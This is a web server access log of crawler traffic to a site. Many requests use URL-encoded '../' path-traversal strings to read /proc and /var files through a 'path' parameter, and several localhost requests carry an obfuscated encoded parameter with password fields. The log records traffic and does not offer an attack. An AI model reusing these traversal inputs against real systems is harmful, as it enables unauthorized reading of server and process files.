216.73.216.215 - - [13/Jan/2026:11:17:42 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2Fnet%2F.%2Funix HTTP/1.0" 200 3327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:45 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F.%2F..%2Fdpkg%2Finfo%2Fdiffutils.md5sums HTTP/1.0" 200 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:48 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F404%2F.%2F.%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:51 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2F122%2Fmaps HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.52 - - [13/Jan/2026:11:17:52 +0300] "GET /?product=1379359300 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
127.0.0.1 - - [13/Jan/2026:11:12:33 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353535332p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313935332q3565363462303839343436363332643830653137663032313864383932363562222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:17:54 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F.%2F122%2Fmaps HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:17:57 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F122%2Fmaps HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:00 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2F.%2Fopt HTTP/1.0" 200 2114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:03 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F438%2Fnet%2Fprotocols HTTP/1.0" 200 1694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:06 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F438%2Fnet%2Fprotocols HTTP/1.0" 200 1691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:09 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fbind%2F..%2Fghostscript%2F.%2F.%2FCMap%2FKatakana HTTP/1.0" 200 2602 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:12 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fvar%2Fagentx HTTP/1.0" 200 1605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:12:54 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353537342p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313937342q3437663834636665346133613135376266386366333830663266633933363161222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:18:15 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fvar%2Fagentx HTTP/1.0" 200 1605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:18 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Fvar%2Fagentx HTTP/1.0" 200 1604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:21 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F625%2Fstatm HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:24 +0300] "GET /072b9/?path=%2Fvar%2Fbackups%2F..%2Frun%2Frpc_pipefs%2F.%2Fstatd HTTP/1.0" 200 1863 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:27 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F197%2Fnet%2Fprotocols HTTP/1.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:30 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F197%2Fnet%2Fprotocols HTTP/1.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:33 +0300] "GET /072b9/?path=%2Fvar%2F.%2Flock%2Fapache2 HTTP/1.0" 200 1905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:13:15 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353539352p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239313939352q6434396362333561373135643666356166353061323334633865633364363034222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:18:36 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F405%2Fmountinfo HTTP/1.0" 200 2315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.203 - - [13/Jan/2026:11:18:36 +0300] "GET /?product=20860116 HTTP/1.0" 200 27775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.73.64 - - [13/Jan/2026:11:18:37 +0300] "GET /product/2409790496.htm HTTP/1.0" 200 26262 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:18:39 +0300] "GET /072b9/?path=%2Fvar%2Frun%2Fdovecot%2F..%2Fsendsigs.omit.d HTTP/1.0" 200 1371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:11:18:40 +0300] "GET /product/2542857361.htm HTTP/1.0" 200 26796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:18:42 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2F.%2Fghostscript%2F..%2Fucf%2Fhashfile.6 HTTP/1.0" 200 3892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:45 +0300] "GET /072b9/?path=%2Fvar%2Frun%2Fudev%2F..%2Fzabbix HTTP/1.0" 200 1923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:48 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F756%2F.%2Fattr%2Fexec HTTP/1.0" 200 1378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:51 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fbind%2F..%2Fghostscript%2F.%2FCMap%2FAdobe-Korea1-UCS2 HTTP/1.0" 200 58056 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:18:54 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fbind%2F..%2Fghostscript%2F.%2F.%2FCMap%2FUniKS-UTF16-V HTTP/1.0" 200 2719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:13:36 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353631362p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323031362q3934373034623237316263316231333632306539626337353235356163343430222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:18:59 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Fproc%2F327%2Fmountstats HTTP/1.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.11 - - [13/Jan/2026:11:18:59 +0300] "GET /?product=1867196236 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:11:19:01 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F327%2Fmountstats HTTP/1.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:04 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F327%2Fmountstats HTTP/1.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:07 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2F756%2Fmountstats HTTP/1.0" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:10 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F.%2F756%2Fmountstats HTTP/1.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:13 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F756%2Fmountstats HTTP/1.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:16 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Fproc%2F756%2Fmountstats HTTP/1.0" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:13:57 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353633372p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323033372q3638393136613762386336633633666463373264366330613265373266643366222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:19:19 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F756%2Fmountstats HTTP/1.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:22 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F863%2Fnet%2F.%2Fnetfilter HTTP/1.0" 200 1922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.65 - - [13/Jan/2026:11:19:22 +0300] "GET /?product=1029105010 HTTP/1.0" 200 25103 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:19:25 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F1583%2Ftask%2F1692%2Fsyscall HTTP/1.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:28 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F137%2F.%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:31 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Ffiles%2F..%2Fbackup%2Ftest-dir HTTP/1.0" 200 1931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:34 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2F327%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:37 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Fproc%2F327%2Fsessionid HTTP/1.0" 200 1377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:14:18 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353635382p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323035382q3863663536386462306165373061636132623966666335656465633362353762222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:19:40 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F327%2Fsessionid HTTP/1.0" 200 1378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:43 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F327%2Fsessionid HTTP/1.0" 200 1378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:46 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F.%2F327%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.65 - - [13/Jan/2026:11:19:48 +0300] "GET /?product=1029104021 HTTP/1.0" 200 25543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:11:19:49 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Fbackup2%2F.%2F..%2Flib%2Fghostscript%2FCMap%2F.%2F. HTTP/1.0" 200 7102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:52 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fmisc%2F..%2Fdpkg%2Fcmethopt HTTP/1.0" 200 1375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:55 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2F756%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:19:58 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F.%2F756%2Fsessionid HTTP/1.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:14:39 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353637392p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323037392q3665663362633061396662373361653838343162623730326237363537333331222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:20:01 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F.%2F756%2Fsessionid HTTP/1.0" 200 1380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:04 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2F.%2Fproc%2F756%2Fsessionid HTTP/1.0" 200 1378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.203 - - [13/Jan/2026:11:20:05 +0300] "GET /?product=1403386795 HTTP/1.0" 200 25623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:11:20:08 +0300] "GET /072b9/?path=%2Fvar%2F..%2Fproc%2F53%2Fnet%2Fpsched HTTP/1.0" 200 1390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:11:20:09 +0300] "GET /?product=841565555 HTTP/1.0" 200 25542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:11:20:11 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F18%2Fns HTTP/1.0" 200 1610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:14 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F406%2Fnet%2Fprotocols HTTP/1.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:17 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F18%2Fns HTTP/1.0" 200 1611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:15:00 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353730302p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323130302q6531623738363439646135613166323465633265303831333065383333343433222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:20:22 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2F19357 HTTP/1.0" 200 1619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:24 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2Fnet%2F.%2F.%2Fsockstat6 HTTP/1.0" 200 1418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:27 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2Fnet%2F.%2F.%2Fsockstat6 HTTP/1.0" 200 1418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:30 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2F.%2Fproc%2Fnet%2F.%2Fsockstat6 HTTP/1.0" 200 1417 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:33 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Ffiles%2F..%2Fbackup%2Fallianz HTTP/1.0" 200 1621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:36 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fpam%2F..%2Furandom%2F. HTTP/1.0" 200 1918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:39 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2F133%2Ffd HTTP/1.0" 200 1626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:15:21 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353732312p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323132312q3166303435376462326636303838313936353131363562633138383530633730222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:20:42 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2F134%2Ffd HTTP/1.0" 200 1626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:45 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2F421%2Ffd HTTP/1.0" 200 1624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:48 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Frun%2F..%2Fproc%2Fmpt%2Fsummary HTTP/1.0" 200 1376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:51 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F58%2F.%2F.%2Ffd HTTP/1.0" 200 1621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
